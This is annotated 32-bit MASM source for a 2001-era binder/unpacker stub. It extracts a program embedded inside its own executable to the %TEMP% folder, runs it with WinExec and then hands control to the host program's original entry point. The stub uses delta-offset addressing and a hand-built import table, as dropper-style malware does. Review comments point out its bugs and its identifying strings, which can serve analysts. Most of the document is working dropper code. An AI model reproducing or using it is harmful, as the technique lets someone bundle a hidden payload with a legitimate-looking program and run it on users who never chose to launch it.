;=======================================================================
; Stage 1 of the unpacker stub: drop the embedded file and run it.
; 32-bit x86, MASM syntax, Win32 stdcall (arguments pushed right-to-left,
; callee pops; eax/ecx/edx are volatile across every call below).
; The `start` entry point and the code that sets up ebp are above this
; excerpt. Every data reference is written [symbol+ebp], so ebp appears
; to hold the delta between the assembled and the run-time address of
; the stub (confirm against the prologue). API calls go through the
; stub's own IAT slots (vXxx dd 0 further down), which the PE loader is
; expected to fill from the v_ImportA/v_ImportB descriptors.
;
; Sequence:
;   1. IndexOffsetaddr/IndexOffsetSize <- Save_add/Save_size
;   2. build two temp file names under %TEMP% with prefix "tmp"
;   3. copy this module to the second temp file
;   4. map the copy and write IndexOffsetSize bytes, starting at file
;      offset IndexOffsetaddr, into the first temp name (renamed .exe)
;   5. WinExec the written file, then DeleteFileA both temp names
;
; NOTE(review): not one API return value is checked in this section.
; A failed CreateFileA yields INVALID_HANDLE_VALUE, a failed
; CreateFileMappingA/MapViewOfFile yields NULL, and each value is passed
; straight into the next call. On-disk artifacts are noted at the
; GetTempFileNameA and DeleteFileA calls.
;=======================================================================
mov eax,[Save_size+ebp]
mov [IndexOffsetSize+ebp],eax ; byte count of the embedded file to extract
mov eax,[Save_add+ebp]
mov [IndexOffsetaddr+ebp],eax ; file offset of the embedded file inside this module
;----------------------------------------- extract embedded file ===
push edx ; preserve edx/ecx/edi/esi across the Win32 calls below
push ecx
push edi
push esi
;------------------------- obtain temporary file names
lea eax,[tmppath+ebp]
push eax
mov eax,size tmppath
push eax
call [vGetTempPathA+ebp] ; GetTempPathA(size tmppath, tmppath): tmppath = %TEMP% directory; returned length ignored
lea eax,[fullname+ebp]
push eax
push 0
lea eax,[headtemp+ebp]
push eax
lea eax,[tmppath+ebp]
push eax
call [vGetTempFileNameA+ebp] ; GetTempFileNameA(tmppath, "tmp", 0, fullname); uUnique=0 also creates an empty tmpXXXX.tmp on disk
lea eax,[fullname+ebp]
push eax
call [vlstrlen+ebp] ; eax = lstrlen(fullname)
mov ecx,eax
dec ecx ; ecx = index of the last character
mov byte ptr [fullname+ecx+ebp],65h ; overwrite the trailing "tmp" with "exe" (65h 78h 65h), last byte first
dec ecx
mov byte ptr [fullname+ecx+ebp],78h ; fullname now reads tmpXXXX.exe, a file that does not exist yet
dec ecx
mov byte ptr [fullname+ecx+ebp],65h ; the tmpXXXX.tmp created by GetTempFileNameA is never deleted (leftover artifact)
lea eax,[fullname+ebp]
mov [vDFilepath+ebp],eax ; destination path = the .exe temp name
lea eax,[tmpcopyname+ebp]
push eax
push 0
lea eax,[headtemp+ebp]
push eax
lea eax,[tmppath+ebp]
push eax
call [vGetTempFileNameA+ebp] ; second temp file (also created on disk) -> tmpcopyname
push 100
lea eax,[vNowFileNames+ebp]
push eax
push 0
call [vGetModuleFileNameA+ebp] ; GetModuleFileNameA(NULL, vNowFileNames, 100): path of this module. 100 < MAX_PATH, so a long path is truncated and the copy below fails silently
push 0
lea eax,[tmpcopyname+ebp]
push eax
lea eax,[vNowFileNames+ebp]
push eax
call [vCopyFileA+ebp] ; CopyFileA(vNowFileNames, tmpcopyname, FALSE): overwrite the temp file with a copy of this module
lea eax,[tmpcopyname+ebp]
mov [vSFilepath+ebp],eax ; source path = the copy of this module
;--------------------------------------------
push 0
push 20h
push 3h
push 0
push 0
push 0c0000000h
mov eax,[vSFilepath+ebp]
push eax
call [vCreateFileA+ebp] ; CreateFileA(vSFilepath, GENERIC_READ|GENERIC_WRITE, no sharing, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_ARCHIVE, NULL)
mov [vFile_s+ebp],eax ; INVALID_HANDLE_VALUE on failure, not checked
push 0
push 0
push 0
push 4h
push 0
mov eax,[vFile_s+ebp]
push eax
call [vCreateFileMappingA+ebp] ; CreateFileMappingA(vFile_s, NULL, PAGE_READWRITE, 0, 0, NULL): mapping object over the whole copy
mov [vFMap_s+ebp],eax ; NULL on failure, not checked
push 0
push 20h
push 4h
push 0
push 3h
push 0c0000000h
mov eax,[vDFilepath+ebp]
push eax
call [vCreateFileA+ebp] ; CreateFileA(vDFilepath, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_ARCHIVE, NULL)
mov [vFile_d+ebp],eax ; INVALID_HANDLE_VALUE on failure, not checked
push 0
push 0
push 0
push 2h
mov eax,[vFMap_s+ebp]
push eax
call [vMapViewOfFile+ebp] ; MapViewOfFile(vFMap_s, FILE_MAP_WRITE, 0, 0, 0): view of the entire file
mov [vMemory+ebp],eax ; view base address; NULL on failure, not checked
lea edx,[vReadBy+ebp] ; edx = &vReadBy, used as lpNumberOfBytesWritten
mov eax,[IndexOffsetaddr+ebp]
add [vMemory+ebp],eax ; vMemory = view base + payload file offset; this overwrites the base address in place (see UnmapViewOfFile below)
push 0
push edx
mov eax,[IndexOffsetSize+ebp]
push eax
mov eax,[vMemory+ebp]
push eax
mov eax,[vFile_d+ebp]
push eax
call [vWriteFile+ebp] ; WriteFile(vFile_d, vMemory, IndexOffsetSize, &vReadBy, NULL); neither success nor vReadBy is checked. If IndexOffsetaddr+IndexOffsetSize exceeds the file length the read runs past the mapped view
mov eax,[vMemory+ebp]
push eax
call [vUnmapViewOfFile+ebp] ; BUG: vMemory was advanced by IndexOffsetaddr above, so this is not the base address MapViewOfFile returned; the call fails (unless the offset is 0) and the view stays mapped until process exit
mov eax,[vFMap_s+ebp]
push eax
call [vCloseHandle+ebp] ; CloseHandle(vFMap_s); closing the mapping object does not release a still-mapped view
mov [vFMap_s+ebp],0 ; clear the saved mapping handle (the two file handles below are not cleared)
mov eax,[vFile_s+ebp]
push eax
call [vCloseHandle+ebp] ; CloseHandle(vFile_s)
mov eax,[vFile_d+ebp]
push eax
call [vCloseHandle+ebp] ; CloseHandle(vFile_d)
push 1h
lea eax,[fullname+ebp]
push eax
call [vWinExec+ebp] ; WinExec(fullname, SW_SHOWNORMAL): run the extracted file; result (> 31 means success) not checked
;--------------- delete the temporary files
lea eax,[tmpcopyname+ebp]
push eax
call [vDeleteFileA+ebp] ; DeleteFileA(tmpcopyname): remove the copy of this module
lea eax,[fullname+ebp]
push eax
call [vDeleteFileA+ebp] ; DeleteFileA(fullname): Windows refuses to delete an executable whose image is mapped by a running process, so this likely fails and the .exe remains on disk
pop esi
pop edi
pop ecx
pop edx
;-----------------------------------------
;------------------ Stage 2: rebuild the original program's import table ----
; In:  [BASE_RVA+ebp] = image base of the unpacked program
;      [MI_RVA+ebp]   = RVA of its IMAGE_IMPORT_DESCRIPTOR array
; Registers: edx = image base, esi = current descriptor, ebx = DLL name /
;      thunk value, edi = IAT slot being written, eax = scratch / results.
; Each descriptor is 20 bytes: +0 OriginalFirstThunk, +0Ch Name,
; +10h FirstThunk. For every DLL the module handle is obtained (or the
; DLL is loaded), every thunk is resolved with GetProcAddress and the
; address is stored into FirstThunk[i]. Any failure shows a message box
; and calls ExitProcess(0). Storing to [edi] needs the target IAT pages
; to be writable; whatever arranges that is outside this excerpt — confirm.
; Does not fall through: ends with a jump to [Src_addr], the original
; entry point.
mov edx,[BASE_RVA+ebp] ; edx = image base saved earlier (outside this excerpt)
mov esi,[MI_RVA+ebp] ; esi = base + import directory RVA = first descriptor
add esi,edx
Next_DLL:
mov eax,[esi+0ch] ; eax = descriptor.Name (RVA of the DLL name string)
or eax,eax
jz Dll_END ; a descriptor with Name == 0 terminates the array
add eax,edx ; eax = VA of the DLL name
mov ebx,eax ; keep the name for the LoadLibraryA retry
push eax
call [vGetModuleHandleA+ebp] ; GetModuleHandleA(name): already loaded?
or eax,eax
jnz Dll_LOADED
push ebx
call [vLoadLibraryA+ebp] ; LoadLibraryA(name): not yet loaded, load it
or eax,eax
jnz Dll_LOADED
Exit_LOADER: ; reached by fall-through when LoadLibraryA failed, and by jump when GetProcAddress failed
lea eax,[MI_ERR_TITLE+ebp]
push 64 ; uType = 40h (MB_ICONINFORMATION)
push eax ; lpCaption = MI_ERR_TITLE
lea eax,[MI_ERR_TEXTS+ebp]
push eax ; lpText = MI_ERR_TEXTS
push 0 ; hWnd = NULL
call [vMessageBoxA+ebp]
push 0
call [vExitProcess+ebp] ; ExitProcess(0); never returns
Dll_LOADED:
mov [hDll+ebp],eax ; save the module handle
mov [FunTable_Count+ebp],0 ; byte index into the thunk arrays; one dword per entry
Next_FUNCTION:
mov edx,[BASE_RVA+ebp] ; edx is caller-saved across the API calls, reload the base
mov eax,[esi] ; eax = OriginalFirstThunk (import name table RVA)
or eax,eax
jnz Hint_OK
mov eax,[esi+10h] ; no INT: read the thunk value from FirstThunk instead
Hint_OK:
add eax,edx
add eax,[FunTable_Count+ebp] ; eax = &thunk[i]
mov ebx,[eax] ; ebx = thunk value (RVA of IMAGE_IMPORT_BY_NAME, or ordinal with bit 31 set)
;;;;;;
mov edi,[esi+10h]
add edi,edx
add edi,[FunTable_Count+ebp] ; edi = &FirstThunk[i], the IAT slot to fill
;;;;;;
test ebx,ebx
jz Function_END ; a zero thunk terminates this DLL's list
test ebx,80000000h ; IMAGE_ORDINAL_FLAG32 set -> import by ordinal
jnz Function_ORDINAL
add ebx,edx
add ebx,2 ; skip the 2-byte Hint of IMAGE_IMPORT_BY_NAME: ebx = name string
jmp Function_GOON
Function_ORDINAL:
and ebx,0FFFFFFFh ; clears bit 31 but keeps bits 16..27; the ordinal is the low 16 bits (IMAGE_ORDINAL masks with 0FFFFh), so this relies on the upper bits being zero as the PE spec requires
Function_GOON:
push ebx
push dword ptr [hDll+ebp]
call [vGetProcAddress+ebp] ; GetProcAddress(hDll, name or ordinal)
or eax,eax
jz Exit_LOADER ; unresolved import -> error box and exit
mov [edi],eax ; store the resolved address into the IAT slot
add [FunTable_Count+ebp],4 ; next dword entry
jmp Next_FUNCTION
Function_END:
add esi,14h ; sizeof(IMAGE_IMPORT_DESCRIPTOR) = 20: advance to the next DLL descriptor
mov edx,[BASE_RVA+ebp]
jmp Next_DLL
Dll_END:
;----------------------------------
mov eax,[Src_addr+ebp]
jmp eax ; transfer control to the original entry point; nothing below is executed
align 4
;---- the stub's own import directory --------------
; Two IMAGE_IMPORT_DESCRIPTORs (KERNEL32.DLL, USER32.DLL) followed by a
; zero terminator. Field layout: OriginalFirstThunk, TimeDateStamp,
; ForwarderChain, Name, FirstThunk. All values are offsets relative to
; v_ImportA rather than RVAs; presumably the packer that embeds this stub
; adds the stub's RVA to them before the image is written — confirm.
v_ImportA dd Ker_API-v_ImportA ; OriginalFirstThunk: IMAGE_THUNK_DATA array (import name table)
v_TimeDateA dd 0 ; TimeDateStamp (unbound)
v_ForChainA dd 0 ; ForwarderChain: none
v_DllNameA dd KerName-v_ImportA ; Name: DLL name string
v_FThunkA dd vGetProcAddress-v_ImportA ; FirstThunk: IAT, overwritten by the loader with function addresses
v_ImportB dd Use_API-v_ImportA ; OriginalFirstThunk for USER32
v_TimeDateB dd 0 ; TimeDateStamp (unbound)
v_ForChainB dd 0 ; ForwarderChain: none
v_DllNameB dd UserName-v_ImportA ; Name: DLL name string
v_FThunkB dd vMessageBoxA-v_ImportA ; FirstThunk: IAT for USER32
dd 20 dup (0) ; all-zero descriptor terminates the array (one descriptor is 5 dwords; the extra zeros are padding)
KerName db 'KERNEL32.DLL',0
; KERNEL32 import name table: offsets of the hint/name entries, zero-terminated.
; Order must match the IAT slots vGetProcAddress..vWinExec below (17 entries each).
Ker_API dd KAPI_A-v_ImportA
dd KAPI_B-v_ImportA
dd KAPI_C-v_ImportA
dd KAPI_D-v_ImportA
dd KAPI_E-v_ImportA
dd KAPI_F-v_ImportA
dd KAPI_G-v_ImportA
dd KAPI_H-v_ImportA
dd KAPI_I-v_ImportA
dd KAPI_J-v_ImportA
dd KAPI_K-v_ImportA
dd KAPI_L-v_ImportA
dd KAPI_M-v_ImportA
dd KAPI_N-v_ImportA
dd KAPI_O-v_ImportA
dd KAPI_P-v_ImportA
dd KAPI_Q-v_ImportA
dd 0 ; end of KERNEL32 name table
UserName db 'USER32.DLL',0
Use_API dd UAPI_A-v_ImportA ; USER32 import name table: a single entry
dd 0
; IAT slots. The code calls through these as [vXxx+ebp]; the PE loader
; fills each with the resolved address. NOTE(review): the KERNEL32 IAT has
; no zero terminator of its own — vMessageBoxA follows vWinExec directly.
; The Windows loader walks the zero-terminated name table (Ker_API), so
; this works, but anything that walks FirstThunk instead would run on
; into the USER32 slot.
vGetProcAddress dd 0
vGetModuleHandleA dd 0
vLoadLibraryA dd 0
vExitProcess dd 0
vCreateFileA dd 0
vCreateFileMappingA dd 0
vGetTempPathA dd 0
vGetTempFileNameA dd 0
vlstrlen dd 0
vMapViewOfFile dd 0
vWriteFile dd 0
vUnmapViewOfFile dd 0
vCloseHandle dd 0
vCopyFileA dd 0
vGetModuleFileNameA dd 0
vDeleteFileA dd 0
vWinExec dd 0
vMessageBoxA dd 0 ; USER32 IAT slot
dd 0 ; end of USER32 IAT
; IMAGE_IMPORT_BY_NAME entries: 2-byte Hint (0) followed by the
; zero-terminated function name.
KAPI_A db 0,0,'GetProcAddress',0
KAPI_B db 0,0,'GetModuleHandleA',0
KAPI_C db 0,0,'LoadLibraryA',0
KAPI_D db 0,0,'ExitProcess',0
KAPI_E db 0,0,'CreateFileA',0
KAPI_F db 0,0,'CreateFileMappingA',0
KAPI_G db 0,0,'GetTempPathA',0
KAPI_H db 0,0,'GetTempFileNameA',0
KAPI_I db 0,0,'lstrlen',0
KAPI_J db 0,0,'MapViewOfFile',0
KAPI_K db 0,0,'WriteFile',0
KAPI_L db 0,0,'UnmapViewOfFile',0
KAPI_M db 0,0,'CloseHandle',0
KAPI_N db 0,0,'CopyFileA',0
KAPI_O db 0,0,'GetModuleFileNameA',0
KAPI_P db 0,0,'DeleteFileA',0
KAPI_Q db 0,0,'WinExec',0
UAPI_A db 0,0,'MessageBoxA',0
;----------------------------
align 4
vImport_End: ; end of the import directory block
;----------------------------
; Stub state. The values below are read via [symbol+ebp]; MI_RVA,
; BASE_RVA, Src_addr, Save_add and Save_size are all zero here and must
; be filled in before the code above runs — presumably by the packer when
; it embeds the stub, or by code above this excerpt (confirm).
MI_RVA dd 0 ; RVA of the original program's import directory
BASE_RVA dd 0 ; image base of the original program
hDll dd 0 ; module handle of the DLL currently being resolved
FunTable_Count dd 0 ; byte index into the current thunk arrays (4 per entry)
MI_ERR_TITLE db "系统错误!",0 ; error box caption ("System error!")
MI_ERR_TEXTS db "资源无法装入,请与软件供应商联系!",0 ; error box text ("Resource could not be loaded, please contact the software vendor!")
;----------------------------
Src_addr dd 0 ; original entry point; target of the final jmp
;----------------------------
Save_add dd 0 ; file offset at which the embedded data starts
Save_size dd 0 ; size of the embedded data in bytes
;----------------------------
TestMsg db '这是后面的,成功啦!',0 ; debug string ("This is the part after, success!"); not referenced in this excerpt
;-------------------------------- used only by the extraction stage
tmppath db 250 dup(0) ; %TEMP% directory from GetTempPathA (250 < MAX_PATH, so a very long path may be truncated)
fullname db 250 dup(0) ; temp name of the dropped .exe
headtemp db "tmp",0 ; prefix passed to GetTempFileNameA
vSFilepath dd 0 ; -> tmpcopyname (copy of this module, the source)
vDFilepath dd 0 ; -> fullname (the dropped .exe, the destination)
IndexOffsetaddr dd 0 ; copy of Save_add
IndexOffsetSize dd 0 ; copy of Save_size
vFile_s dd 0 ; source file handle
vFMap_s dd 0 ; source file mapping handle
vFile_d dd 0 ; destination file handle
vMemory dd 0 ; mapped view base, later advanced by IndexOffsetaddr
vReadBy dd 0 ; bytes written by WriteFile (never examined)
tmpcopyname db 250 dup(0) ; temp name of the module copy
vNowFileNames db 100 dup(0) ; path of this module; 100 bytes is less than MAX_PATH
;---------------------------------------------
; Identification strings of the stub author/version; useful as static
; markers when recognising binaries built with this stub.
about_a db "MakeFrom:Blend 2001",0
about_b db "Author:vBin",0
about_c db "VER:1.0 Beta 1",0
;---------------------------------------------
vend: ; end-of-stub marker
end start